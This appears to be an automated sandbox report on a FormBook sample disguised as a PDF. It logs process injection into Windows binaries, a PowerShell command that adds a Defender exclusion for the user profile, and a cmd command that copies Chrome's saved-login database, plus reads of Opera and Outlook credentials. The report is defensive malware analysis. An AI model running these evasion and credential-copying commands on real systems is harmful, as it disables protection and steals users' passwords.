Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 240000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E7C008	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 300A008	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2F07008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE4ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

9_2_00DE4ACA

Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2130140124.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2127441350.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000003.3076417197.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3074909396.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EC890
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EB900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EC960

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7860860 GetSystemTimeAsFileTime,

0_2_00007FF7D7860860

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
101 2043 5770 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

